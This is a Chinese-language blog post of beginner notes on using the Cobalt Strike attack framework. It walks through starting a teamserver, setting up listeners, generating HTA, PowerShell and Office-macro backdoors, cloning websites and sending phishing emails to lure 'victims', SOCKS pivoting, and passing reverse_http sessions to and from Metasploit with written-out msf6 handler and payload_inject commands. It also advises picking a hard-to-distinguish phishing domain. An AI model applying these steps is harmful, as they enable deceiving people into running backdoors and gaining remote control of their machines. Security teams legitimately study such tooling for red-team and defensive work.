cs 入门使用

在github上找到一个非常全面的cs教程

浅浅的记录一下

https://github.com/zer0yu/Awesome-CobaltStrike

 

首先cs是一款内网渗透的多人运动神器,Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll
马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java
执行,浏览器自动攻击等等功能,还有非常丰富的插件库

启动命令

sudo nohup ./teamserver 192.168.0.190 123456

 

监听器

beaconcobalt strike的内置监听器 包括dnshttphttpssmb四种方式的监听器 foreign为外部监
听器,配合Metasploit或者Armitage的监听器。

http地址(stager)这个可以填写ip本身 也可以填写多个域名 但是这个域名解析必须是teamserver的地
址。在dns增加了多条a记录均指向teamserverip

生成后门模块

hta文档

是后门的一种
这里他给我们提供了3种生成方式 exe,powershell,vba。其中VBA方法需要目标系统上的Microsoft
Office,在系统支持的情况下我们一般选择powershell,因为这种方式更加容易免杀。通常我们结合
host File(文件下载功能) 来实行钓鱼。

office 宏

部分用户在使用office 的时候总喜欢点开运行宏文件,不得不说这是一种很具有欺骗性的方法,大部分没接触过安全的人可能觉得word或者excel

文件是安全的.

将cs生成的代码放置到宏里就可以了

payload生成器

 

web钓鱼模块

网站钓鱼

Manage 对开启的web服务进行管理;
Clone Site 克隆网站,可以记录受害者提交的数据;
Host File 提供一个文件下载,可以修改Mime信息;
Scripted Web Delivery 类似于msf web_delivery ;
Signed Applet Attack 使用java自签名的程序进行钓鱼攻击;
Smart Applet Attack 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21
以下版本;
System Profiler 用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等

 

大体的使用方法就是克隆网站然后诱导受害者访问

受害者访问的时候会自动弹出下载文件

这个时候我们就需要给网站整一个好点的域名

区分度低些的

 

邮件钓鱼

从邮箱里导出eml的钓鱼模板

然后可以考虑将上面生成的web钓鱼网站的连接放到该邮件中

我们需要搭建一个邮件服务器我们才能够使用这个功能

 

Beacon使用

beacon 最初的目的是为了会话分派,但是在版本不断的更新之中,它有的更多的功能

我们可以用它进行端口扫描,网络探测,浏览器代理,列出进程等

由于没有啥复杂的操作,这里就略过

 

代理转发

socks代理

beacons里配置

socks 1080

proxychains.conf 文件中配置

socks4 192.168.0.195 1080

 

转发上线

新建的监听器在会话里新建

然后生成后门

再诱导内网用户运行后门即可

 

vpn 部署

 

会话

Cobalt Strike Beacon 最初是一个稳定的生命线,让你可以保持对受害主机的访问权限。从一开始,
Beacon 的主要目的就是向其他的 Cobalt Strike 监听器传递权限。
使用 spawn 命令来为一个监听器派生一个会话。此 spawn 命令接受一个架构(如:x86x64)和一
个监听器作为其参数。
默认情况下, spawn 命令会在 rundll32.exe 中派生一个会话

spwan 会话

 

注入进程获取会话

进程界面然后点击左下角的注入即可

 

派生会话到msf

msf照常监听端口

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 10.10.10.141
lhost => 10.10.10.141
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > run

cs需要设置一个Foregin http 监听器

ip和端口填写的是msf的ip以及端口

再beacon 里使用命令 spawn msf 然后会话就会派生到msf里

 

从msf派生会话到cs

cs 正常建立监听器

msf选择payload_inject 模块,设置参数 disablepayloadhandler 禁止msf监听

use windows/local/payload_inject
set disablepayloadhandler true
set paylaod windows/meterpreter/reverse_http
set lhost 192.168.0.195
set lport 9999
set session 1
exploit

 

后渗透

获取hash 

 

提权

需要自行去github上寻找cs提权脚本

 

获取明文密码

 

横向渗透

 

 

posted @ 2022-05-06 10:27  r0nGer  阅读(971)  评论(0)    收藏  举报